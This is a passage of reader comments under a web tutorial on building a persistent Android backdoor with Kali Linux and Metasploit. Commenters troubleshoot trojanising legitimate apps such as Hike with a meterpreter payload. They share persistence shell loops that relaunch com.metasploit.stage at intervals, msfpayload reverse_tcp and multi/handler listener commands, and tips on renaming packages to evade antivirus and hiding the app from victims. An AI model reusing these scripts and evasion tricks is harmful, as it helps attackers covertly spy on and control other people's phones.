Do i need to modify the script to work because i have embeded it into an another apk.Help would be really appriciated.
FOLLOW US REPLY
F.E.A.R.
2 YEARS AGO 1
Since I don't use Hike, you can check the correct location by navigating to /sdcard/Android/Data/ for "com.google......."
And the /."..." is used to execute the application, so decompile the app (hike) and extract the name of the program, it should be in the .xml file.
Also this would make the application (hike) with the malicious app open,
but I am sure you will find a way out ;)
REPLY
ADARSH SINGH
2 YEARS AGO 1
REPLY
ADARSH SINGH
2 YEARS AGO 1
Hey Fear as you said i tried to modified the script but it is not working for me or else i am doing it wrong.I am providing you with the android manifest.xml .Here is
the androidmanifest.xml
http://www.mediafire.com/view/0jbw13nh4di2ani/AndroidManifest.xml.txt
You told me to navigate to /sdcard/Android/Data/ for "com.google......." and here is the output of that
http://www.mediafire.com/view/4j4t2kq6oqwd7ea/output.txt
So please tell me what changes should i make in "com.metasploit.stage/.MainActivity" to make the script working please i really appreciate if you help me out of this.
REPLY
MM A
1 WEEK AGO 1
come on man i have the same problem if the app opens with the exploit he/she will uninstall it :((((( what should we do ??
REPLY
DARK BLOGGER
2 YEARS AGO 1
how do you do that? can you sent me a copy of your eclipse project?
i have found a way to make it fud by change name in package com.metasploit.stage to com.yourname.stage and also in the java files import package
com.yourname.stage
but i cant make it persistannce because i need to register a receiver and also after i need to bind it with another legitime app
REPLY
CV NIKHIL
10 MONTHS AGO 1
is internet is required?
REPLY
CB
2 YEARS AGO - EDITED 2 YEARS AGO 1
Hi F.E.A.R thanks you for guide. I have a problem to access in /sdcard and also in principally system folder. The error is: stdapifschdir: Operation failed: 1. Can you help
me? Test Phone: S3 and S5
I saw that when I install the apk not asking for access permission to sdcard...
REPLY
ZI LSD
2 YEARS AGO 1
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 22/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
The apk crash with this code in MainActivity
FOLLOW US
PackageManager p = getPackageManager();
p.setComponentEnabledSetting(componentName,PackageManager.COMPONENTENABLEDSTATEDISABLED, PackageManager.DONTKILLAPP);
REPLY
ZI LSD
2 YEARS AGO 2
I Found!
Mod backdoor for persistent and hide ico. No rooted devices >>
HERE : HT1.txt
REPLY
HASOC
1 YEAR AGO - EDITED 1 YEAR AGO 1
Hi, Do you have a recompiled version of your mod? Would like to try it.
Or can you plz elaborate how to implement and recompile android payload with your mod (HT1.txt)?
Cheers in advance!
REPLY
ECLIPSE
2 YEARS AGO 1
Hi, it said the apk is virus when i send it and installed it. the guy had some software cm security or something like it and it said of main activity a dangerous program
and it was killed by the anti virus. now how to make save it from the anti virus? ideas? thanks yes it is a great post xD
REPLY
F.E.A.R.
2 YEARS AGO 1
REPLY
VISHAL RAGHAV
2 YEARS AGO - EDITED 2 YEARS AGO 1
hey F.E.A.R. you are doing some grt work here and your tutorial made me so much interested in hacking. a big thanks to u...
model number - Tp link w8968v4 i hv tried every guide on the internet but i am unable to get it to work. and can you tell me if there is any way to keylog the hacked
but "not rooted" device.
REPLY
DARK BLOGGER
2 YEARS AGO 1
i have the source code of msf payload how i add a receiver?for example bootcomplete or alarm ? because your persistance scipt it works but generates sessions every
20 seconds.
i have found how to make it seems like a legitime app and bypass antivirus but my problem is i need help with android receivers
REPLY
SANDEEP YADAV
1 YEAR AGO 1
i have a problem when im install the backdoor in the android im getting an error (THERE WAS A PROBLEM WHILE PARSING THE PACKAGE )
REPLY
BIRAT BOSE
1 YEAR AGO 1
Hellooo !! can anybody help me about removing the payload android apk from the victim's phone?? plzzz help!!
REPLY
HAMMAD RAHMAN
1 YEAR AGO 1
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 23/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
Hi there F.E.A.R
GREAT tutorial!!
FOLLOW US
I got WAN working and everything
But, my phone is rooted, and when i drop into shell and su, it shows superuser prompt on screen to get access for MainActivity.
therefore, wont the victim see this and decline it? It is meant to be discreet, no?
REPLY
MOJTABA GHANIDEL
1 YEAR AGO 1
I have singed and aligned the payload..but it does not install on Huawei phones!!
while makeing the payload..I got no errors.
REPLY
SIMON TADROS
1 YEAR AGO 1
REPLY
AB'S CHOUDHARY
1 YEAR AGO 1
REPLY
MOJTABA GHANIDEL
1 YEAR AGO - EDITED 1 YEAR AGO 1
but the "upload command" didn't work for me so I uploaded the script using USB cable to my device ( /sd/download) and after shell command and executing the script,
I exited the listener and made a new one..but no session activated.
REPLY
MOJTABA GHANIDEL
1 YEAR AGO 1
REPLY
MOJTABA GHANIDEL
1 YEAR AGO 1
Any answers???
REPLY
UGLY LAD
1 YEAR AGO 1
can any body help me ? i get a meterpreter connection and then i upload anything.sh however when i execute anything.sh via shell the script runs but says
com.metasploit.stage/.MainActivity not found
REPLY
ROSE
1 YEAR AGO 1
Hi
REPLY
ROSE
1 YEAR AGO 1
Hi there, I have question. If I install Kali on VM machine, which IP will be public and which will be private (Internal).
As I got an issue while session (meterpreter) and I think this will solve the issue.
Thanks
REPLY
UGLY LAD
1 YEAR AGO 1
type if config in VM kali to get your internal ip and googly m ip to get your public ip
WONDERHOWTO GADGET HACKS NEXT REALITY NULL BYTE
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 24/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
REPLY
1
FOLLOW US
ROSE
1 YEAR AGO
REPLY
ROSE
1 YEAR AGO 1
Nothing appear
REPLY
ROSE
1 YEAR AGO 1
Also, Android device, .apk file I got that the app. already installed coz I install it before, how I can remove maybe this cause issue
REPLY
ROSE
1 YEAR AGO 1
please assist me
REPLY
ROSE
1 YEAR AGO 1
REPLY
ROSE
1 YEAR AGO 1
No response>>
REPLY
MOJTABA GHANIDEL
1 YEAR AGO 1
REPLY
ROSE
1 YEAR AGO 1
Hi, thanks dear. Your answer is make a sense and I will try it now.
REPLY
MATHIS GAXBOY
1 YEAR AGO 1
REPLY
MOJTABA GHANIDEL
1 YEAR AGO 1
on LAN or WAN?
if ur trying on LAN and dont get meterpreter session, there must be problems with ur listener port or payload file..
if ur trying on WAN then u should check ur port forwarding. also u need to check if there is any problems while making the payloadfile.apk
REPLY
NIMA AMINI
1 YEAR AGO 1
Hey guys
I backdoored th payload into HotSpot and change the anything.sh to this:
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.Main -n com.anchorfree.ui/.ViewHome
sleep 600
done
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 25/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
Error type 3
Error: Activity class {com.anchorfree.ui/com.anchorfree.ui.ViewHome} does not exist. FOLLOW US
I do everything exactly as you said. Would you please say what should I do?
REPLY
MOJTABA GHANIDEL
4 MONTHS AGO 1
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.Main -n package name/activity address
sleep 600
done
REPLY
GIREESH PAI
1 YEAR AGO 1
REPLY
SAHIL HARIDAS
1 YEAR AGO 1
Thanks for the great post F.E.A.R. but I cant seem to be able to change the directory to init.d
When I listed all the files it wasn't found. Is there an alternate folder is it possible that the startup folder has changed on my Huawei P8???
REPLY
JONE DEEP
1 YEAR AGO 1
REPLY
FRANCK KOUASSI
1 YEAR AGO -1 HIDDEN
ABHISHEK SEVARIK
1 YEAR AGO 1
thanks fear
but when i execute sh anything.sh it says syntax error while is unmatched what should i do
please reply me as soon as possible
REPLY
KALYAN VISWANATH
1 YEAR AGO 1
Hi FEAR
Am getting this error
Please help
REPLY
HUSSAM FELIMBO
1 YEAR AGO - EDITED 1 YEAR AGO 1
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 26/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
Will I have to change ".MainActivity" if I changed the appname in <string name="appname">MainActivity</string> when decompiling the malicious apk according to
this? FOLLOW US
Keep up the wonderful work!
Thanks!
REPLY
WALEED AFZAL
1 YEAR AGO 1
REPLY
WALEED AFZAL
1 YEAR AGO 1
F.E.A.R i have a problem my meterpreter is not open i don't know why when i enter the command exploit it try to start but can't start u tell me what's the problem i try
this from 1 week
REPLY
SAGAR BALYAN
1 YEAR AGO 1
This backdoor doesn't work for me at all ! I have uploaded the backdoor on victim's phone but it doesn't bring the session back once it has died.
Please Help !
REPLY
DRMTR FDFFS
1 YEAR AGO 1
Exploit Works !
ExitOnSession false
exploit -j
REPLY
MOJTABA GHANIDEL
1 YEAR AGO 2
REPLY
this is only for rooted cellphones? I can't find the init.d folder, where i have to upload the .sh ?
REPLY
BARROW
1 YEAR AGO 1
REPLY
ALEX ALEX
1 YEAR AGO 1
I can't open the sdcard after the session opens. What should I do?
REPLY
WONDERHOWTO GADGET HACKS NEXT REALITY NULL BYTE
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 27/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
GANESH VARMA
1 YEAR AGO - EDITED 1 YEAR AGO
FOLLOW US
1
hi great tutorial,i was able to get meterpreter session over my local network but can't make it work over internet(WAN).Unfortunately i have a router (DIGISOL-HR1400)
which has port triggeringinstead of port forwarding and i have heard that it is similar to port forwarding. I've tried a number of ways to set up port triggering but it just
doesn't work. So any kind of help on how to set up port triggering is really appereciated!! :)
REPLY
>_E.X.P.L.O.I.T
1 YEAR AGO 1
REPLY
FUNKY FUNKYDREAM
1 YEAR AGO 1
Hi F.E.A.R
thanks for this tuto ;)
for my phone the reversetcp exploit works but not the remaining of the tuto ... :(
sh getroot.sh
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.
I'm using a Samsung Galaxy Grand Prime (Android 5.1.1 / Kernel 3.14.27-1070395)
Best
FunkyDream
REPLY
SIVA ADITHYA
1 YEAR AGO 1
First this is a great tutorial.. but i need help when i exicuited this script i got error as Error: Bad component name: com.metasploit.stage/
REPLY
can anybody tell me how to modify the .sh file to match with embed payload in another original apk, how should i change the perimeters of the script?
REPLY
PAPANIREAL
11 MONTHS AGO - EDITED 11 MONTHS AGO 1
REPLY
DHARMI STEPH
11 MONTHS AGO - EDITED 11 MONTHS AGO 1
Thank you for your great tutorial F.E.A.R but I'm having a problem running the script in shell...
I'm getting
Error type 3
Error: Activity class {com.metasploit. stage/com.metsaploit.stage.MainActivity} does not exist.
Here is a screenshot below
WONDERHOWTO GADGET HACKS NEXT REALITY NULL BYTE
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 28/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
FOLLOW US
REPLY
AKANSHA SINGH
11 MONTHS AGO 1
I've embedded it in hike apk. The error comes that the com.metasploit.stage.MainActivity doesnot exists. How to fix this?
REPLY
IRRESISTIBLE GUY
10 MONTHS AGO 1
Please Help me for Port forwarding i am in desparate need to exploit an android on other another network.
REPLY
GHADEER ALALI
8 MONTHS AGO 1
Anyone knows the list for all cmds available to execute on victims phone?
for e.g. delete media.
REPLY
SARTORY NONAME
8 MONTHS AGO 1
Hi F.E.A.R.,
thanks for the tutorial.
It's all working except for the last and crutial step:
after
sh anything.sh
java.lang.SecurityException: Permission Denial: startActivity asks to run as user -2 but is calling from user 0; this requires
android.permission.INTERACTACROSSUSERS_FULL
at android.os.Parcel.readException(Parcel.java:1686)
at android.os.Parcel.readException(Parcel.java:1639)
at android.app.ActivityManagerProxy.startActivityAsUser(ActivityManagerNative.java:3119)
at com.android.commands.am.Am.runStart(Am.java:635)
at com.android.commands.am.Am.onRun(Am.java:388)
at com.android.internal.os.BaseCommand.run(BaseCommand.java:51)
at com.android.commands.am.Am.main(Am.java:121)
at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)
at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:262)
Sartory
REPLY
SARTORY NONAME
8 MONTHS AGO 1
Found a solution:
On Android 6.0 you have to use the following script:
#!/bin/bash
# upload to etc/init.d/, so that it is persistent even afterReboot!
while :
do am startservice --user 0 com.metasploit.stage/.MainService
sleep 60
done
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 29/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
¯\(?)/¯ Sartory
FOLLOW US REPLY
TAHA TEMURI
8 MONTHS AGO 1
Meterpreter session not receiving when I ran payload my IP address is dynamic so could it be reason for not receiving the payload,I used the following.
For payload
msfpayload android/meterpreter/reverse_tcp LHOST=MYEXTERNALIPHERE R > /root/abcde.apk
Then for Listener
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST MYPRIVATEIP
exploit
REPLY
MAT PON
7 MONTHS AGO 1
i learned that is possible to make backdoor persistent by enable apk starting on phone boot / startup. there are plenty of material about.
2) to prevent antivirus to block installation i think we properly need to sign the apk
3) thanks
REPLY
ABDUL MANAN
5 MONTHS AGO 1
hey
i just wanted to say i did as you said but whenever i try to reconnect or say reboot it just don't connect and giver error and while on victims end it says unfortunately
mainactivity stopped working any suggestions ?
REPLY
HACK3RSP0T .
5 MONTHS AGO 1
REPLY
PRUDHVI GALI
5 MONTHS AGO 1
REPLY
CONNER DASSEN
LAST MONTH 1
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 30/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
I had the handler listening for 2 minutes and nothing happened, but when I turned on the screen it instantly connected. And it keeps losing the connection, often it says
"Session closed. Reason: died" within 2 minutes. FOLLOW US
REPLY
YOU
LOGIN TO COMMENT
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 31/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
FOLLOW US
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 32/33
12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo
FOLLOW US
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ 33/33